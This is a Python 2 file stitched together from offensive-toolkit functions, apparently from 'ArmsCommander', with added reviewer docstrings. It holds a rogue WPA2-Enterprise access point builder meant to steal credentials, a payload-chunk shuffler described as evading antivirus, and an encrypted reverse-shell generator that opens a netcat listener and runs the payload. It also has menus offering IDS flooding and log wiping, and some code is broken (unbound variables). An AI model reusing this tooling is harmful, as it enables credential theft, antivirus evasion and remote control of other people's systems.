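def write_hostapd_conf():
    """Prompt for AP parameters and write ``hostapd.conf`` for a WPA2-Enterprise AP.

    Changes the working directory to the MGT_ENT_cracker log directory, asks
    the operator for an ESSID, a BSSID and a channel, and writes a hostapd
    configuration that enables 802.1X (``ieee8021x=1``, ``wpa_key_mgmt=WPA-EAP``)
    and points authentication at a RADIUS server on 127.0.0.1:1812.

    Returns:
        None. The configuration file is written as a side effect.
    """
    os.chdir("/root/ArmsCommander/logs/MGT_ENT_cracker/")
    essid_str = str(raw_input(toolkits.yellow(
        "Enter the ESSID ('name') you want the AP to be called: ")))
    bssid_str = str(raw_input(toolkits.yellow(
        "Enter the BSSID MAC address you want to be called: ")))
    channel_str = str(raw_input(toolkits.yellow(
        "Enter what channel you want to use on: ")))

    # NOTE(review): the three answers are interpolated verbatim and are not
    # checked for format; a value containing a line break would add extra
    # directives to the generated file.
    # NOTE(review): the RADIUS shared secret is a fixed literal in the template
    # and wpa_pairwise still lists TKIP next to CCMP.
    # NOTE(review): defender's view - an AP built from this file copies only
    # the network name and BSSID; supplicants that verify the RADIUS server
    # certificate chain and server name are the control against it.
    hostapd_conf_contents = """
interface=wlan0
driver=nl80211
ssid={0}
bssid={1}
logger_stdout_level=0
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=2
wpa_key_mgmt=WPA-EAP
channel={2}
wpa_pairwise=TKIP CCMP""".format(essid_str, bssid_str, channel_str)

    # Context manager closes the handle even if the write fails.
    with open("hostapd.conf", "w") as conf_file:
        conf_file.write(hostapd_conf_contents)
    print(toolkits.green("Your new hostapd conf file is completed"))
    return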
def commandSegmentationTech(readLines):
    """Split each input line into chunks, shuffle them, and record how to undo the shuffle.

    Args:
        readLines: iterable of strings, one command line each.

    Returns:
        dict keyed by a running line counter (0, 1, ...). Each value is the
        tuple ``(shuffledLine, arrayMap)``: the shuffled list of chunks and,
        for every chunk of the original line in order, the index that
        ``findIndexValue`` reported for it within the shuffled list.
    """
    shuffledPayload = {}
    ctr = 0
    for l in readLines:
        arrayMap = []
        brokenLine = l
        # '..?' yields two-character chunks, plus a one-character chunk at the
        # end of an odd-length line.
        brokenLine = re.findall('..?',brokenLine)
        print "DEBUG: Malicious command broken apart before shuffling\r\n{}".format(brokenLine)
        # random.sample over the full length returns a random permutation of the chunks.
        shuffledLine = random.sample(brokenLine,len(brokenLine))
        print "DEBUG: Shuffled line to evade antivirus\r\n{}".format(shuffledLine)
        # Build the index map used to put the line back in its original order.
        for lElement in brokenLine:
            query = lElement
            # findIndexValue is defined elsewhere; presumably it returns the
            # position of `query` in shuffledLine - TODO confirm.
            index = findIndexValue(query,shuffledLine)
            arrayMap.append(index)
        # One entry per input line: (shuffled chunks, index map).
        shuffledPayload[ctr] = shuffledLine,arrayMap
        print "DEBUG: Array-Map to reconstitute the payload\r\n{}".format(str(arrayMap))
        ctr += 1
    # NOTE(review): only the chunk order changes. Every chunk is still stored
    # verbatim, and the line is whole again once reconstituteLine() has run,
    # so inspection of the command that actually executes is unaffected by
    # this step; only matching on the stored byte sequence is.
    print green("DEBUG: ShuffledPayload with ArrayMaps for reconstitution:\r\n{}".format(shuffledPayload))
    return shuffledPayload
def reconstituteLine(shuffledLine,arrayMap):
    """Rebuild a line from its shuffled chunks.

    Args:
        shuffledLine: sequence of chunks in shuffled order.
        arrayMap: sequence of indices into ``shuffledLine``, one per chunk of
            the original line, listed in original order.

    Returns:
        The chunks selected by ``arrayMap``, concatenated in that order.
    """
    print(red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine)))
    print(yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap)))
    # Walk the index map and glue the selected chunks back together.
    rebuilt = "".join([str(shuffledLine[position]) for position in arrayMap])
    print(green("DEBUG: Reconstituted Command:\r\n{}".format(str(rebuilt))))
    return rebuilt
def pexpect_thread(cmd):
    """Spawn ``cmd`` under pexpect, wait for a timeout, EOF or marker string, and log the output.

    Args:
        cmd: command line handed unchanged to ``pexpect.spawn``.

    Returns:
        Written as ``(results, outcomes, exceptions)``; see the review notes
        at the return statement for the paths on which that cannot succeed.
    """
    encoding = 'utf-8'
    # Binds a local named `time`; the value is not used again in this function.
    time = timer_thread()
    thread = pexpect.spawn(cmd, timeout=300)
    # Marker pattern for expect(); .decode() on a str literal is Python 2 only.
    dogass = 'f**k you pexpect module'
    dogass = dogass.decode('utf-8')
    # expect() returns the index of whichever list entry matched first.
    outcomes = thread.expect([pexpect.TIMEOUT, pexpect.EOF, dogass])
    if (outcomes == 0):
        # Timeout: collect what was printed so far and stop the child.
        print green("pexpect.TIMEOUT condition reached")
        results = thread.read()
        thread.terminate()
        # NOTE(review): open() without a mode opens for reading, so the
        # write() below fails; the marker branch further down uses 'a+'.
        w = open('./airodump.log')
        w.write(results)
        w.close()
    elif (outcomes == 1 ):
        # EOF: the child has closed its output; a newline is sent regardless.
        # NOTE(review): `results` is never assigned on this path.
        print yellow("pexpect.EOF conditioning reached")
        thread.sendline('\n')
    elif (outcomes == 2):
        # Marker string seen: append the remaining output to the log.
        print green("Woo, the variable is dog-ass")
        print yellow("Thank you so much for wasting my time.")
        results = thread.read()
        thread.terminate()
        w = open('./airodump.log', 'a+')
        w.write(results)
        w.close()
    else:
        # NOTE(review): with three patterns the index is 0, 1 or 2, so this
        # branch looks unreachable - confirm.
        exception = thread.read()
        exception = str(exception.encode('utf-8')).strip().rstrip()
        print exception
        x = open('./exceptions_threading.log', 'a+')
        x.write(exception)
        x.close()
    # NOTE(review): `exceptions` is not assigned anywhere in this function
    # (the else branch binds `exception`), and `results` is unbound on the EOF
    # and else paths, so this line raises unless a module-level `exceptions`
    # exists and `results` was set above.
    return results, outcomes, exceptions
def five_wireless_attacks():
    """Show the WIRELESS ATTACKS menu and run the module the operator picks.

    Option 0 hands control back to ``main()``. Options 1-5 run their module
    and return. Option 6 runs its module and then shows this menu again.
    Any other input prints an error and shows the menu again.
    """
    banner = colored('WIRELESS ATTACKS', 'cyan', attrs=['bold'])
    print(banner)
    menu_lines = [
        '\n\t#0. Return to Main Menu',
        '#1. Cylon-Raider, automate wireless "Replay-Attacks" from the Aircrack-ng Suite',
        '#2. Cylon Heavy-Raider, automate the WPS PIN brute-forcing vulnerability with Reaver',
        '#3. Router-Sploit, Post-Exploitation hacking of APs that you cracked the passwords of',
        '#4. ARP Injection Test, seeing if your external wireless card is working properly',
        '#5. Hidden Network Decloaker, uncover hidden wireless APs',
        '#6. ***NEW*** DRADIUS WPA2-MGT/ENT (name tentative to change), impersonate Enterprise/Management/PEAP encrypted WPA2 Access Points, steal credentials!',
    ]
    print("\n\t".join(menu_lines))
    # The newest entry is printed a second time, highlighted.
    print(toolkits.green('\t' + menu_lines[6]))
    selection = str(raw_input("Enter a OPTION: "))

    # Lambdas defer the name lookup until an entry is actually chosen.
    actions = {
        "0": lambda: main(),
        "1": lambda: cylon_raider(),
        "2": lambda: heavy_raider(),
        "3": lambda: router_sploit(),
        "4": lambda: ARP_injection_test(),
        "5": lambda: hidden_network_decloaker(),
        "6": lambda: mgt_ent_attacker(),
    }
    if selection not in actions:
        print(colored('You have entered a invalid option', 'red'))
        five_wireless_attacks()
        return

    os.system('clear')
    actions[selection]()
    if selection == "6":
        # Only option 6 comes back to this menu afterwards.
        five_wireless_attacks()
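def readSuspectedDomains(
        suspectedDomains='/home/ctlister/Documents/Contract-VirusTotal/real_malware_domains.txt'
):
    """Run ``testFunction`` on every host listed in a text file.

    Args:
        suspectedDomains: path to a text file with one host per line. The
            default is an absolute path under one user's home directory.

    Returns:
        None.

    Raises:
        IOError: if the file cannot be opened.
    """
    # Read everything up front so the handle is closed before any lookups run.
    with open(suspectedDomains, 'r') as domain_file:
        lines = domain_file.readlines()

    # The earlier random.sample(lines, 4) result was never used, and it raised
    # ValueError for lists shorter than four entries; every line is processed.
    for line in lines:
        host = line.strip()
        if not host:
            # Skip blank lines instead of querying an empty host name.
            continue
        print(toolkits.green("Targeting {}".format(str(host))))
        # testFunction is defined elsewhere; what it does with the host is
        # not visible from this block.
        testFunction(host)
    return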
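def launch_teamserver(login_parameters):
    """Start the services the Armitage teamserver needs, then launch it.

    Args:
        login_parameters: sequence whose first item is the public IP address
            and whose second item is the teamserver password.

    Returns:
        None.
    """
    import subprocess  # local import: the file's import block is not visible here

    os.chdir('/usr/share/armitage')
    public_ip = login_parameters[0]
    teamserver_password = login_parameters[1]

    print(toolkits.green('PRE-FLIGHT: BEGINNING PRE-FLIGHT CHECKS'))
    print(toolkits.yellow('PRE-FLIGHT: Starting up PostgreSQL server'))
    os.system('service postgresql start')
    print(toolkits.yellow('PRE-FLIGHT: Starting up Metasploit Service'))
    os.system('service metasploit start')
    print(toolkits.yellow('PRE-FLIGHT: Initializing Metasploit Database'))
    os.system('msfdb init')
    print(toolkits.green('LAUNCHING: Starting Metasploit Database'))
    os.system('msfdb start')
    print(toolkits.yellow(
        'LAUNCHING: Killing all RUBY processes to shut down existing PIDs of msfrpc daemon'
    ))
    # NOTE(review): this ends every ruby process on the host, not only msfrpcd.
    os.system('killall ruby')
    print(toolkits.yellow(
        'LAUNCHING: Killing any processes occupying PORT 55553'))
    os.system('fuser -k 55553/tcp')
    print(toolkits.green('Starting up Teamserver!'))

    # The address and password go in as separate argv entries, not as a
    # formatted shell string: spaces or shell metacharacters in either value
    # are no longer parsed by /bin/sh. The password is still an argv entry, so
    # it stays visible in the local process list while teamserver runs.
    try:
        subprocess.call(['teamserver', str(public_ip), str(teamserver_password)])
    except OSError as err:
        # os.system only returned a non-zero status when the binary was
        # missing; keep that non-fatal behaviour.
        print(toolkits.yellow(
            'LAUNCHING: could not start teamserver: {0}'.format(err)))
    return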
def main():
    """Build one payload file from the template, print debug output, open a listener, run the file.

    The steps, as visible here: generate a key and IV, read the code template,
    shuffle the lines of ``template_reverse_shell`` with
    ``commandSegmentationTech``, encrypt the result with ``cryptor``, and have
    ``writeUniquePayload`` write the output file.

    Returns:
        None.
    """
    decryptKey = generateKey()
    decryptIV = generateIV()
    code = read_template()
    # Bare expression statement: evaluates the name and discards the value.
    template_reverse_shell
    payloadNoEncrypt = template_reverse_shell.splitlines()
    shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
    l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
    # NOTE(review): the key and IV are handed to writeUniquePayload together
    # with the ciphertext, so the generated file presumably carries everything
    # needed to decrypt itself - confirm in writeUniquePayload. If so, the
    # encryption hides the content from static inspection only; anyone holding
    # the file can recover the plaintext.
    outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
    print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
    out = b64encode(l_encrypted)
    print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
    print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
    # NOTE(review): this handle is never closed.
    rp = open(outfile, 'rb+')
    uniquePayload = rp.read()
    print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
    print yellow(uniquePayload)
    print cyan("Opening netcat session")
    # NOTE(review): LPORT and outfile are formatted into shell command strings
    # for os.system here and below.
    os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(str(LPORT)))
    print green("You may run the payload with\r\npython {}".format(str(outfile)))
    # Fixed two-second pause before the generated file is executed.
    time.sleep(2)
    print green("Executing payload")
    os.system("python {}".format(str(outfile)))
    return
def three_remote_exploits_redesigned():
    """Show the REMOTE EXPLOITATION menu and run the submenu the operator picks.

    Option 0 hands control back to ``main()``. Options 1-4 run their submenu
    and then show this menu again. Any other input prints an error and shows
    the menu again.
    """
    banner = colored('REMOTE EXPLOITATION', 'cyan', attrs=['bold'])
    print(banner)
    menu_lines = [
        '\n\t#0. Return to Main Menu',
        '#1. PAYLOAD GENERATORS & LISTENERS, Metasploit Msfvenom, and open source alternatives RATs like Pupy and Stitch',
        '#2. TOOLKITS, Social Engineers Toolkit',
        '#3. OTHER, Does not fit in any other category, USB Rubber Ducky Encoders, stuff like Virus-Total Safe-Checker',
        '#4. ***NEW***: FOREPLAY PROJECT, Easy-Mode Hacker Collaboration, gang up on single targets, easily generate Armitage Teamservers!',
    ]
    print("\n\t".join(menu_lines))
    # The newest entry is printed a second time, highlighted.
    print(toolkits.green('\t' + menu_lines[4]))
    selection = str(raw_input("Enter a OPTION: "))

    if selection == "0":
        os.system('clear')
        main()
        return

    # Lambdas defer the name lookup until an entry is actually chosen.
    submenus = {
        "1": lambda: payload_generators_listeners(),
        "2": lambda: remote_exploit_toolkits(),
        "3": lambda: remote_exploits_other(),
        "4": lambda: foreplay(),
    }
    if selection in submenus:
        os.system('clear')
        submenus[selection]()
    else:
        print(colored('You have entered a invalid option', 'red'))
    # Every path except option 0 ends by showing this menu again.
    three_remote_exploits_redesigned()
    return
def two_net_defense_traffic_monitor():
    """Show the NETWORK DEFENSE menu and run the module the operator picks.

    Option 0 hands control back to ``main()``. Options 1-9 clear the screen,
    print a start banner and run their module. Option 10 copies and prints
    ``/var/log/auth.log`` and then calls ``main()``. Option 11 runs
    ``jkd_poc()`` and shows this menu again. Any other input prints an error
    and shows the menu again.
    """
    banner = colored('NETWORK DEFENSE', 'cyan', attrs=['bold'])
    print(banner)
    # The '#11.' entry was split across two physical lines in the listing;
    # it is rejoined here as one string.
    menu_lines = [
        '\n\t#0 Return to Main Menu',
        '#1. Tor + Proxychains, conceal your outbound traffic',
        '#2. Network Monitoring Tools, p0f, Snort, and view active network connections',
        '#3. Cover your tracks, clear your bash history and wipe your thumbnails cache',
        '#4. TCP Kill a connection by host, IP, or port',
        '#5. NGrep or "Network Grep", investigate a suspicious connection',
        '#6. MacChanger, change your network card MAC address temporarily',
        '#7. Fuser, identify and kill processes within a port range',
        '#8. IDS Flooder, overwhelm a Intrusion Detection System with false-flag DDoS attacks to draw attention away from your actual activity',
        '#9. FAIL-2-BAN, automatic banning daemon for SSH. Absolutely essential for remote AWS servers that are subjected to constant SSH brute-force attacks',
        '#10. VIEW AUTH LOG, view your authentication log and make a backup of it.',
        '#11. ***NEW***, JKD: Bluce-Ree Edition, auto-counterattack aggressive NMAP scans using a Metasploit Server Design Flaw',
    ]
    print("\n\t".join(menu_lines))
    # The newest entry is printed a second time, highlighted.
    print(toolkits.green('\t' + menu_lines[11]))
    selection = str(raw_input("Enter a OPTION: "))

    # Options 1-9 share one shape: clear, green start banner, run the module.
    # Lambdas defer the name lookup until an entry is actually chosen.
    modules = {
        "1": ('[+] Starting Tor + Proxychains', lambda: tor_and_proxychains()),
        "2": ('[+] Starting Monitoring Tools', lambda: network_monitor_tools()),
        "3": ('[+] Starting Cover Your Tracks', lambda: cover_tracks()),
        "4": ('[+] Starting TCP Kill', lambda: TCPKill()),
        "5": ('[+] Starting Network Grep', lambda: NGrep()),
        "6": ('[+] Starting Mac Changer Interactive Menu', lambda: macchanger()),
        "7": ('[+] Starting Fuser', lambda: fuser()),
        "8": ('[+] Starting IDS Flooder Module', lambda: IDS_Flooder()),
        "9": ('[+] Starting fail2ban Module', lambda: fail2ban()),
    }

    if selection == "0":
        os.system('clear')
        main()
        return

    if selection in modules:
        start_message, run_module = modules[selection]
        os.system('clear')
        print(colored(start_message, 'green', attrs=['bold']))
        run_module()
        return

    if selection == "10":
        os.system('clear')
        print(colored('[+] Copying backup of auth.log to /root/Documents',
                      'yellow', attrs=['bold']))
        os.system('cp -r /var/log/auth.log /root/Documents')
        os.system('cat /var/log/auth.log')
        main()
        return

    if selection == "11":
        # Unlike the other options, this one does not clear the screen first.
        jkd_poc()
    else:
        print(colored('You have entered a invalid option', 'red'))
    two_net_defense_traffic_monitor()
    return
def green(string):
    """Print ``string`` through ``toolkits.green`` and return the result.

    Because the result is printed here, a caller that also prints the return
    value emits the text twice.
    """
    tinted = toolkits.green(string)
    print(tinted)
    return tinted